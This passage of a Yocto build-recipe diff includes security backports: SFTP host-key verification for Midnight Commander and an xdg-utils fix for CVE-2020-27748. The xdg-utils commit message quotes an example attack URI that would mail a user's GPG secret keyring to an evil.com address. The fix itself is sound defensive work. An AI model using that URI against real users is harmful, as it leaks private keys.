0 on success, regular libssh2 error code otherwise ++ * ++ * Thanks the Curl project for the code used in this function. ++ */ ++static int ++sftpfs_update_known_hosts (struct vfs_s_super *super, const char *remote_key, size_t remote_key_len, ++ int type_mask) ++{ ++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super); ++ int rc; ++ ++ /* add this host + key pair */ ++ rc = libssh2_knownhost_addc (sftpfs_super->known_hosts, super->path_element->host, NULL, ++ remote_key, remote_key_len, NULL, 0, type_mask, NULL); ++ if (rc < 0) ++ return rc; ++ ++ /* write the entire in-memory list of known hosts to the known_hosts file */ ++ rc = libssh2_knownhost_writefile (sftpfs_super->known_hosts, sftpfs_super->known_hosts_file, ++ LIBSSH2_KNOWNHOST_FILE_OPENSSH); ++ ++ if (rc < 0) ++ return rc; ++ ++ (void) message (D_NORMAL, _("Information"), ++ _("Permanently added\n%s (%s)\nto the list of known hosts."), ++ super->path_element->host, sftpfs_super->ip_address); ++ ++ return 0; ++} ++ ++/* --------------------------------------------------------------------------------------------- */ ++/** ++ * Compute and return readable host key fingerprint hash. ++ * ++ * @param session libssh2 session handle ++ * @return pointer to static buffer on success, NULL otherwise ++ */ ++static const char * ++sftpfs_compute_fingerprint_hash (LIBSSH2_SESSION * session) ++{ ++ static char result[SHA1_DIGEST_LENGTH * 3 + 1]; /* "XX:" for each byte, and EOL */ ++ const char *fingerprint; ++ size_t i; ++ ++ /* The fingerprint points to static storage (!), don't free() it. */ ++ fingerprint = libssh2_hostkey_hash (session, LIBSSH2_HOSTKEY_HASH_SHA1); ++ if (fingerprint == NULL) ++ return NULL; ++ ++ for (i = 0; i < SHA1_DIGEST_LENGTH && i * 3 < sizeof (result) - 1; i++) ++ g_snprintf ((gchar *) (result + i * 3), 4, "%02x:", (guint8) fingerprint[i]); ++ ++ /* remove last ":" */ ++ result[i * 3 - 1] = '\0'; ++ ++ return result; ++} ++ ++/* --------------------------------------------------------------------------------------------- */ ++ + /** +- * Recognize authenticaion types supported by remote side and filling internal 'super' structure by ++ * Process host info found in ~/.ssh/known_hosts file. ++ * ++ * @param super connection data ++ * @param mcerror pointer to the error handler ++ * @return TRUE on success, FALSE otherwise ++ * ++ * Thanks the Curl project for the code used in this function. ++ */ ++static gboolean ++sftpfs_process_known_host (struct vfs_s_super *super, GError ** mcerror) ++{ ++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super); ++ const char *remote_key; ++ const char *key_type; ++ const char *fingerprint_hash; ++ size_t remote_key_len = 0; ++ int remote_key_type = LIBSSH2_HOSTKEY_TYPE_UNKNOWN; ++ int keybit = 0; ++ struct libssh2_knownhost *host = NULL; ++ int rc; ++ char *msg = NULL; ++ gboolean handle_query = FALSE; ++ ++ remote_key = libssh2_session_hostkey (sftpfs_super->session, &remote_key_len, &remote_key_type); ++ if (remote_key == NULL || remote_key_len == 0 ++ || remote_key_type == LIBSSH2_HOSTKEY_TYPE_UNKNOWN) ++ { ++ mc_propagate_error (mcerror, 0, "%s", _("sftp: cannot get the remote host key")); ++ return FALSE; ++ } ++ ++ switch (remote_key_type) ++ { ++ case LIBSSH2_HOSTKEY_TYPE_RSA: ++ keybit = LIBSSH2_KNOWNHOST_KEY_SSHRSA; ++ key_type = "RSA"; ++ break; ++ case LIBSSH2_HOSTKEY_TYPE_DSS: ++ keybit = LIBSSH2_KNOWNHOST_KEY_SSHDSS; ++ key_type = "DSS"; ++ break; ++#ifdef LIBSSH2_HOSTKEY_TYPE_ECDSA_256 ++ case LIBSSH2_HOSTKEY_TYPE_ECDSA_256: ++ keybit = LIBSSH2_KNOWNHOST_KEY_ECDSA_256; ++ key_type = "ECDSA"; ++ break; ++#endif ++#ifdef LIBSSH2_HOSTKEY_TYPE_ECDSA_384 ++ case LIBSSH2_HOSTKEY_TYPE_ECDSA_384: ++ keybit = LIBSSH2_KNOWNHOST_KEY_ECDSA_384; ++ key_type = "ECDSA"; ++ break; ++#endif ++#ifdef LIBSSH2_HOSTKEY_TYPE_ECDSA_521 ++ case LIBSSH2_HOSTKEY_TYPE_ECDSA_521: ++ keybit = LIBSSH2_KNOWNHOST_KEY_ECDSA_521; ++ key_type = "ECDSA"; ++ break; ++#endif ++#ifdef LIBSSH2_HOSTKEY_TYPE_ED25519 ++ case LIBSSH2_HOSTKEY_TYPE_ED25519: ++ keybit = LIBSSH2_KNOWNHOST_KEY_ED25519; ++ key_type = "ED25519"; ++ break; ++#endif ++ default: ++ mc_propagate_error (mcerror, 0, "%s", ++ _("sftp: unsupported key type, can't check remote host key")); ++ return FALSE; ++ } ++ ++ fingerprint_hash = sftpfs_compute_fingerprint_hash (sftpfs_super->session); ++ if (fingerprint_hash == NULL) ++ { ++ mc_propagate_error (mcerror, 0, "%s", _("sftp: can't compute host key fingerprint hash")); ++ return FALSE; ++ } ++ ++ rc = libssh2_knownhost_checkp (sftpfs_super->known_hosts, super->path_element->host, ++ super->path_element->port, remote_key, remote_key_len, ++ LIBSSH2_KNOWNHOST_TYPE_PLAIN | LIBSSH2_KNOWNHOST_KEYENC_RAW | ++ keybit, &host); ++ ++ switch (rc) ++ { ++ default: ++ case LIBSSH2_KNOWNHOST_CHECK_FAILURE: ++ /* something prevented the check to be made */ ++ goto err; ++ ++ case LIBSSH2_KNOWNHOST_CHECK_MATCH: ++ /* host + key pair matched -- OK */ ++ break; ++ ++ case LIBSSH2_KNOWNHOST_CHECK_NOTFOUND: ++ /* no host match was found -- add it to the known_hosts file */ ++ msg = g_strdup_printf (_("The authenticity of host\n%s (%s)\ncan't be established!\n" ++ "%s key fingerprint hash is\nSHA1:%s.\n" ++ "Do you want to add it to the list of known hosts and continue connecting?"), ++ super->path_element->host, sftpfs_super->ip_address, ++ key_type, fingerprint_hash); ++ /* Select "No" initially */ ++ query_set_sel (2); ++ rc = query_dialog (_("Warning"), msg, D_NORMAL, 3, _("&Yes"), _("&Ignore"), _("&No")); ++ g_free (msg); ++ handle_query = TRUE; ++ break; ++ ++ case LIBSSH2_KNOWNHOST_CHECK_MISMATCH: ++ msg = g_strdup_printf (_("%s (%s)\nis found in the list of known hosts but\n" ++ "KEYS DO NOT MATCH! THIS COULD BE A MITM ATTACK!\n" ++ "Are you sure you want to add it to the list of known hosts and continue connecting?"), ++ super->path_element->host, sftpfs_super->ip_address); ++ /* Select "No" initially */ ++ query_set_sel (2); ++ rc = query_dialog (MSG_ERROR, msg, D_ERROR, 3, _("&Yes"), _("&Ignore"), _("&No")); ++ g_free (msg); ++ handle_query = TRUE; ++ break; ++ } ++ ++ if (handle_query) ++ switch (rc) ++ { ++ case 0: ++ /* Yes: add this host + key pair, continue connecting */ ++ if (sftpfs_update_known_hosts (super, remote_key, remote_key_len, ++ LIBSSH2_KNOWNHOST_TYPE_PLAIN ++ | LIBSSH2_KNOWNHOST_KEYENC_RAW | keybit) < 0) ++ goto err; ++ break; ++ case 1: ++ /* Ignore: do not add this host + key pair, continue connecting anyway */ ++ break; ++ case 2: ++ default: ++ mc_propagate_error (mcerror, 0, "%s", _("sftp: host key verification failed")); ++ /* No: abort connection */ ++ goto err; ++ } ++ ++ return TRUE; ++ ++ err: ++ { ++ int sftp_errno; ++ ++ sftp_errno = libssh2_session_last_errno (sftpfs_super->session); ++ sftpfs_ssherror_to_gliberror (sftpfs_super, sftp_errno, mcerror); ++ } ++ ++ return FALSE; ++} ++ ++/* --------------------------------------------------------------------------------------------- */ ++/** ++ * Recognize authentication types supported by remote side and filling internal 'super' structure by + * proper enum's values. + * + * @param super connection data +@@ -461,6 +867,9 @@ sftpfs_open_connection (struct vfs_s_super *super, GError ** mcerror) + if (sftpfs_super->session == NULL) + return (-1); + ++ if (!sftpfs_read_known_hosts (super, mcerror)) ++ return (-1); ++ + /* ... start it up. This will trade welcome banners, exchange keys, + * and setup crypto, compression, and MAC layers + */ +@@ -475,13 +884,8 @@ sftpfs_open_connection (struct vfs_s_super *super, GError ** mcerror) + return (-1); + } + +- /* At this point we havn't yet authenticated. The first thing to do +- * is check the hostkey's fingerprint against our known hosts Your app +- * may have it hard coded, may go to a file, may present it to the +- * user, that's your call +- */ +- sftpfs_super->fingerprint = +- libssh2_hostkey_hash (sftpfs_super->session, LIBSSH2_HOSTKEY_HASH_SHA1); ++ if (!sftpfs_process_known_host (super, mcerror)) ++ return (-1); + + if (!sftpfs_recognize_auth_types (super)) + { +@@ -538,7 +942,13 @@ sftpfs_close_connection (struct vfs_s_super *super, const char *shutdown_message + sftpfs_super->agent = NULL; + } + +- sftpfs_super->fingerprint = NULL; ++ if (sftpfs_super->known_hosts != NULL) ++ { ++ libssh2_knownhost_free (sftpfs_super->known_hosts); ++ sftpfs_super->known_hosts = NULL; ++ } ++ ++ MC_PTR_FREE (sftpfs_super->known_hosts_file); + + if (sftpfs_super->session != NULL) + { +diff --git a/src/vfs/sftpfs/internal.h b/src/vfs/sftpfs/internal.h +index 5616fb8990..643ce5e3cc 100644 +--- a/src/vfs/sftpfs/internal.h ++++ b/src/vfs/sftpfs/internal.h +@@ -42,6 +42,9 @@ typedef struct + sftpfs_auth_type_t auth_type; + sftpfs_auth_type_t config_auth_type; + ++ LIBSSH2_KNOWNHOSTS *known_hosts; ++ char *known_hosts_file; ++ + LIBSSH2_SESSION *session; + LIBSSH2_SFTP *sftp_session; + +@@ -51,7 +54,7 @@ typedef struct + char *privkey; + + int socket_handle; +- const char *fingerprint; ++ const char *ip_address; + vfs_path_element_t *original_connection_info; + } sftpfs_super_t; + diff --git a/meta/recipes-extended/mc/mc_4.8.26.bb b/meta/recipes-extended/mc/mc_4.8.26.bb index 5c5e6790d8..906778400e 100644 --- a/meta/recipes-extended/mc/mc_4.8.26.bb +++ b/meta/recipes-extended/mc/mc_4.8.26.bb @@ -11,6 +11,8 @@ RRECOMMENDS_${PN} = "ncurses-terminfo" SRC_URI = "http://www.midnight-commander.org/downloads/${BPN}-${PV}.tar.bz2 \ file://0001-mc-replace-perl-w-with-use-warnings.patch \ file://nomandate.patch \ + file://CVE-2021-36370.patch \ + file://0001-Ticket-4200-fix-FTBFS-with-ncurses-build-with-disabl.patch \ " SRC_URI[sha256sum] = "9d6358d0a351a455a1410aab57f33b6b48b0fcf31344b9a10b0ff497595979d1" @@ -23,7 +25,9 @@ PACKAGECONFIG ??= "" PACKAGECONFIG[smb] = "--enable-vfs-smb,--disable-vfs-smb,samba," PACKAGECONFIG[sftp] = "--enable-vfs-sftp,--disable-vfs-sftp,libssh2," -CFLAGS_append_libc-musl = ' -DNCURSES_WIDECHAR=1 ' +# enable NCURSES_WIDECHAR=1 only if ENABLE_WIDEC has not been explicitly disabled (e.g. by the distro config). +# When compiling against the ncurses library, NCURSES_WIDECHAR needs to explicitly set to 0 in this case. +CFLAGS_append_libc-musl = "${@' -DNCURSES_WIDECHAR=1' if bb.utils.to_boolean((d.getVar('ENABLE_WIDEC') or 'True')) else ' -DNCURSES_WIDECHAR=0'}" EXTRA_OECONF = "--with-screen=ncurses --without-gpm-mouse --without-x --disable-configure-args" CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl'" diff --git a/meta/recipes-extended/net-tools/net-tools_2.10.bb b/meta/recipes-extended/net-tools/net-tools_2.10.bb index de4a715971..2dafe96356 100644 --- a/meta/recipes-extended/net-tools/net-tools_2.10.bb +++ b/meta/recipes-extended/net-tools/net-tools_2.10.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://ifconfig.c;beginline=11;endline=15;md5=d1ca372080ad5401e23ca0afc35cf9ba" SRCREV = "80d7b95067f1f22fece9537dea6dff53081f4886" -SRC_URI = "git://git.code.sf.net/p/net-tools/code;protocol=https \ +SRC_URI = "git://git.code.sf.net/p/net-tools/code;protocol=https;branch=master \ file://net-tools-config.h \ file://net-tools-config.make \ file://Add_missing_headers.patch \ diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb index 88b4cf4a03..3d35a17c92 100644 --- a/meta/recipes-extended/newt/libnewt_0.52.21.bb +++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb @@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac S = "${WORKDIR}/newt-${PV}" -inherit autotools-brokensep python3native python3-dir +inherit autotools-brokensep python3native python3-dir python3targetconfig EXTRA_OECONF = "--without-tcl --with-python" diff --git a/meta/recipes-extended/parted/files/check-vfat.patch b/meta/recipes-extended/parted/files/check-vfat.patch new file mode 100644 index 0000000000..c64130a4e2 --- /dev/null +++ b/meta/recipes-extended/parted/files/check-vfat.patch @@ -0,0 +1,51 @@ +Add checks for both mkfs.vfat and the vfat file system in the kernel before +running tests. + +Upstream-Status: Pending +Signed-off-by: Ross Burton <ross.burton@arm.com> + +diff --git a/tests/t-lib-helpers.sh b/tests/t-lib-helpers.sh +index 4c6c75f..2cc7577 100644 +--- a/tests/t-lib-helpers.sh ++++ b/tests/t-lib-helpers.sh +@@ -418,3 +418,13 @@ require_64bit_() + ;; + esac + } ++ ++# Check if the specified filesystem is either built into the kernel, or can be loaded ++# as a module ++# Usage: has_filesystem vfat ++# Ruturns 0 if the filesystem is available, otherwise skips the test ++require_filesystem_() ++{ ++ grep -q $1 /proc/filesystems && return 0 ++ modprobe --quiet --dry-run $1 || skip_ "this test requires kernel support for $1" ++} +diff --git a/tests/t1100-busy-label.sh b/tests/t1100-busy-label.sh +index f1a13df..0f47b08 100755 +--- a/tests/t1100-busy-label.sh ++++ b/tests/t1100-busy-label.sh +@@ -19,6 +19,9 @@ + . "${srcdir=.}/init.sh"; path_prepend_ ../parted + require_root_ + require_scsi_debug_module_ ++require_fat_ ++require_filesystem_ vfat ++ + ss=$sector_size_ + + scsi_debug_setup_ sector_size=$ss dev_size_mb=90 > dev-name || +diff --git a/tests/t1101-busy-partition.sh b/tests/t1101-busy-partition.sh +index e35e6f0..c813848 100755 +--- a/tests/t1101-busy-partition.sh ++++ b/tests/t1101-busy-partition.sh +@@ -22,6 +22,8 @@ test "$VERBOSE" = yes && parted --version + + require_root_ + require_scsi_debug_module_ ++require_fat_ ++require_filesystem_ vfat + + # create memory-backed device + scsi_debug_setup_ dev_size_mb=80 > dev-name || diff --git a/meta/recipes-extended/parted/files/run-ptest b/meta/recipes-extended/parted/files/run-ptest index 374f1bfbc9..c3d6fca339 100644 --- a/meta/recipes-extended/parted/files/run-ptest +++ b/meta/recipes-extended/parted/files/run-ptest @@ -2,6 +2,6 @@ mkdir -p /etc/udev/mount.blacklist.d echo /dev/sda1 >> /etc/udev/mount.blacklist.d/parted-tmp -rm -f *.log +rm -f tests/*.log make -C tests test-suite.log rm /etc/udev/mount.blacklist.d/parted-tmp diff --git a/meta/recipes-extended/parted/parted_3.4.bb b/meta/recipes-extended/parted/parted_3.4.bb index c15f5aeb0b..4260f3a0d4 100644 --- a/meta/recipes-extended/parted/parted_3.4.bb +++ b/meta/recipes-extended/parted/parted_3.4.bb @@ -11,6 +11,7 @@ SRC_URI = "${GNU_MIRROR}/parted/parted-${PV}.tar.xz \ file://fix-doc-mandir.patch \ file://0002-libparted_fs_resize-link-against-libuuid-explicitly-.patch \ file://run-ptest \ + file://check-vfat.patch \ " SRC_URI[md5sum] = "357d19387c6e7bc4a8a90fe2d015fe80" @@ -35,10 +36,13 @@ do_install_ptest() { cp ${S}/build-aux/test-driver $t/build-aux/ cp -r ${S}/tests $t cp ${B}/tests/Makefile $t/tests/ + mkdir $t/lib + cp ${B}/lib/config.h $t/lib sed -i "s|^VERSION.*|VERSION = ${PV}|g" $t/tests/Makefile sed -i "s|^srcdir =.*|srcdir = \.|g" $t/tests/Makefile sed -i "s|^abs_srcdir =.*|abs_srcdir = \.|g" $t/tests/Makefile - sed -i "s|^abs_top_srcdir =.*|abs_top_srcdir = \.\.|g" $t/tests/Makefile + sed -i "s|^abs_top_srcdir =.*|abs_top_srcdir = "${PTEST_PATH}"|g" $t/tests/Makefile + sed -i "s|^abs_top_builddir =.*|abs_top_builddir = "${PTEST_PATH}"|g" $t/tests/Makefile sed -i "s|^Makefile:.*|Makefile:|g" $t/tests/Makefile sed -i "/^BUILDINFO.*$/d" $t/tests/Makefile for i in print-align print-max print-flags dup-clobber duplicate fs-resize; \ @@ -47,8 +51,8 @@ do_install_ptest() { sed -e 's| ../parted||' -i $t/tests/*.sh } -RDEPENDS_${PN}-ptest = "bash coreutils perl util-linux-losetup python3 make gawk e2fsprogs-mke2fs python3-core" -RRECOMMENDS_${PN}-ptest = "kernel-module-scsi-debug" +RDEPENDS_${PN}-ptest = "bash coreutils perl util-linux-losetup util-linux-mkswap python3 make gawk e2fsprogs-mke2fs e2fsprogs-tune2fs python3-core dosfstools" +RRECOMMENDS_${PN}-ptest += "kernel-module-scsi-debug kernel-module-loop kernel-module-vfat" RDEPENDS_${PN}-ptest_append_libc-glibc = "\ glibc-utils \ locale-base-en-us \ diff --git a/meta/recipes-extended/pigz/files/0001-Fix-bug-when-combining-l-with-d.patch b/meta/recipes-extended/pigz/files/0001-Fix-bug-when-combining-l-with-d.patch new file mode 100644 index 0000000000..9c301f2054 --- /dev/null +++ b/meta/recipes-extended/pigz/files/0001-Fix-bug-when-combining-l-with-d.patch @@ -0,0 +1,50 @@ +From 65986f3d12d434b9bc428ceb6fcb1f6eeeb2c47d Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Mon, 17 Jan 2022 15:36:56 +0800 +Subject: [PATCH] Fix bug when combining -l with -d. + +Though it makes no sense to do pigz -ld, that is implicit when +doing unpigz -l. This commit fixes a bug for that combination. + +Upstream-Status: Backport [https://github.com/madler/pigz/commit/326bba44aa102c707dd6ebcd2fc3f413b3119db0] + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + pigz.c | 14 +++++++------- + 1 file changed, 7 insertions(+), 7 deletions(-) + +diff --git a/pigz.c b/pigz.c +index f90157f..d648216 100644 +--- a/pigz.c ++++ b/pigz.c +@@ -4007,6 +4007,13 @@ local void process(char *path) { + } + SET_BINARY_MODE(g.ind); + ++ // if requested, just list information about the input file ++ if (g.list && g.decode != 2) { ++ list_info(); ++ load_end(); ++ return; ++ } ++ + // if decoding or testing, try to read gzip header + if (g.decode) { + in_init(); +@@ -4048,13 +4055,6 @@ local void process(char *path) { + } + } + +- // if requested, just list information about input file +- if (g.list) { +- list_info(); +- load_end(); +- return; +- } +- + // create output file out, descriptor outd + if (path == NULL || g.pipeout) { + // write to stdout +-- +2.17.1 + diff --git a/meta/recipes-extended/pigz/pigz_2.6.bb b/meta/recipes-extended/pigz/pigz_2.6.bb index 05be9b733f..5c0aab55a7 100644 --- a/meta/recipes-extended/pigz/pigz_2.6.bb +++ b/meta/recipes-extended/pigz/pigz_2.6.bb @@ -8,7 +8,8 @@ SECTION = "console/utils" LICENSE = "Zlib & Apache-2.0" LIC_FILES_CHKSUM = "file://pigz.c;md5=9ae6dee8ceba9610596ed0ada493d142;beginline=7;endline=21" -SRC_URI = "http://zlib.net/${BPN}/fossils/${BP}.tar.gz" +SRC_URI = "http://zlib.net/${BPN}/fossils/${BP}.tar.gz \ + file://0001-Fix-bug-when-combining-l-with-d.patch" SRC_URI[sha256sum] = "2eed7b0d7449d1d70903f2a62cd6005d262eb3a8c9e98687bc8cbb5809db2a7d" PROVIDES_class-native += "gzip-native" diff --git a/meta/recipes-extended/procps/procps_3.3.17.bb b/meta/recipes-extended/procps/procps_3.3.17.bb index c74a901d9a..9fd3db196d 100644 --- a/meta/recipes-extended/procps/procps_3.3.17.bb +++ b/meta/recipes-extended/procps/procps_3.3.17.bb @@ -12,7 +12,7 @@ DEPENDS = "ncurses" inherit autotools gettext pkgconfig update-alternatives -SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \ +SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \ file://sysctl.conf \ file://0001-w.c-correct-musl-builds.patch \ file://0002-proc-escape.c-add-missing-include.patch \ diff --git a/meta/recipes-extended/psmisc/psmisc_23.4.bb b/meta/recipes-extended/psmisc/psmisc_23.4.bb index 894443f4ef..89fe8a709c 100644 --- a/meta/recipes-extended/psmisc/psmisc_23.4.bb +++ b/meta/recipes-extended/psmisc/psmisc_23.4.bb @@ -2,7 +2,7 @@ require psmisc.inc LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" -SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \ +SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \ file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \ " SRCREV = "5fab6b7ab385080f1db725d6803136ec1841a15f" diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb index 5aff2b56a6..ad392138b5 100644 --- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb +++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb @@ -19,7 +19,7 @@ PV = "1.4.2" SRCREV = "6f54e54455c073d08a56ea627c6cd2355a40eb53" -SRC_URI = "git://github.com/thkukuk/${BPN} \ +SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \ file://0001-Use-cross-compiled-rpcgen.patch \ " diff --git a/meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch b/meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch deleted file mode 100644 index dba4494b91..0000000000 --- a/meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch +++ /dev/null @@ -1,32 +0,0 @@ -From 55e11765af2bdc8adfac87dab1fb2682f7e6c236 Mon Sep 17 00:00:00 2001 -From: Khem Raj <raj.khem@gmail.com> -Date: Tue, 9 Jun 2020 22:10:28 -0700 -Subject: [PATCH] Define daddr_t if __DADDR_T_TYPE is not defined - -glibc defined daddr_t but musl does not, ideally it should not be used -and simple int type is enough. However, its better to leave glibc behavior -as it is and only define it to int if daddr_t is not provided by libc - -Upstream-Status: Pending - -Signed-off-by: Khem Raj <raj.khem@gmail.com> - ---- - stress-ng.h | 4 ++++ - 1 file changed, 4 insertions(+) - -diff --git a/stress-ng.h b/stress-ng.h -index 1a66293..802dc25 100644 ---- a/stress-ng.h -+++ b/stress-ng.h -@@ -3763,6 +3763,10 @@ struct shim_statx { - uint64_t __spare2[14]; - }; - -+#ifndef __DADDR_T_TYPE -+typedef int daddr_t; -+#endif -+ - /* old ustat struct */ - struct shim_ustat { - #if defined(HAVE_DADDR_T) diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb b/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb index eb6bdb4a81..3770ba9ae1 100644 --- a/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb +++ b/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb @@ -7,7 +7,6 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \ file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \ - file://no_daddr_t.patch \ " SRC_URI[sha256sum] = "af7779aee38e6d94726ed7d5cf36384a64d50c86e42fff89c141d8609913f425" @@ -24,4 +23,3 @@ do_install() { oe_runmake DESTDIR=${D} install ln -s stress-ng ${D}${bindir}/stress } - diff --git a/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb b/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb index 5dfeca5326..01a079f041 100644 --- a/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb +++ b/meta/recipes-extended/sysklogd/sysklogd_2.2.2.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \ inherit update-rc.d update-alternatives systemd autotools -SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \ +SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \ file://sysklogd \ " diff --git a/meta/recipes-extended/tar/tar_1.34.bb b/meta/recipes-extended/tar/tar_1.34.bb index af04919c41..f41e5b33d4 100644 --- a/meta/recipes-extended/tar/tar_1.34.bb +++ b/meta/recipes-extended/tar/tar_1.34.bb @@ -61,3 +61,7 @@ PROVIDES_append_class-native = " tar-replacement-native" NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}" BBCLASSEXTEND = "native nativesdk" + +# These are both specific to the NPM package node-tar +CVE_CHECK_WHITELIST += "CVE-2021-32803 CVE-2021-32804" +CVE_CHECK_WHITELIST += "CVE-2021-37701 CVE-2021-37712 CVE-2021-37713" diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc index a89560b424..5c19e9a7f4 100644 --- a/meta/recipes-extended/timezone/timezone.inc +++ b/meta/recipes-extended/timezone/timezone.inc @@ -6,7 +6,7 @@ SECTION = "base" LICENSE = "PD & BSD & BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" -PV = "2021a" +PV = "2021d" SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ @@ -14,5 +14,6 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" -SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0" -SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08" +SRC_URI[tzcode.sha256sum] = "ed0d02be79b54f4449ba1f239aeaf9315da490bf32f401d302dcbba4921f591d" +SRC_URI[tzdata.sha256sum] = "d7c188a2b33d4a3c25ee4a9fdc68c1ff462bfdb302cf41343d84ca5942dbddf6" + diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 0000000000..948b9e22e9 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch @@ -0,0 +1,58 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io> +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:sid@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim <joerg@thalheim.io> +--- + scripts/xdg-email.in | 7 +------ + 1 file changed, 1 insertion(+), 6 deletions(-) + +Upstream-Status: Backport +CVE: CVE-2020-27748 + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +- if [ -n "$ATTACH" ] ; then +- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +- fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index d371c5c28c..41b74b8598 100644 --- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb @@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ file://0001-Reinstate-xdg-terminal.patch \ file://0001-Don-t-build-the-in-script-manual.patch \ + file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ " SRC_URI[md5sum] = 